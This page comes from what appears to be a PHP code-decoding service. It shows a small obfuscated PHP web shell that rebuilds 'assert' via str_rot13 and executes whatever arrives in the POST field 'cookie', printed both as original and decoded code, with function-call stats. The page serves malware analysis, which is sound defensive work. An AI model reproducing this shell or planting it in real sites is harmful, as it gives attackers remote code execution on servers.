Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function aishen($user){ $b='s'.'tr_r'.'ot13'; $c=&$b; ..
Decoded Output download
<?php
function aishen($user){
$b='s'.'tr_r'.'ot13';
$c=&$b;
$a=$c('nffreg');
if(empty($user)){
$user="echo '90sec'";
}
$a($user);
}
aishen($_POST['cookie']);
?>
Did this file decode correctly?
Original Code
<?php
function aishen($user){
$b='s'.'tr_r'.'ot13';
$c=&$b;
$a=$c('nffreg');
if(empty($user)){
$user="echo '90sec'";
}
$a($user);
}
aishen($_POST['cookie']);
?>
Function Calls
aishen | 1 |
str_rot13 | 1 |
Stats
MD5 | f78213380d9802149c839974b188f0d0 |
Eval Count | 0 |
Decode Time | 86 ms |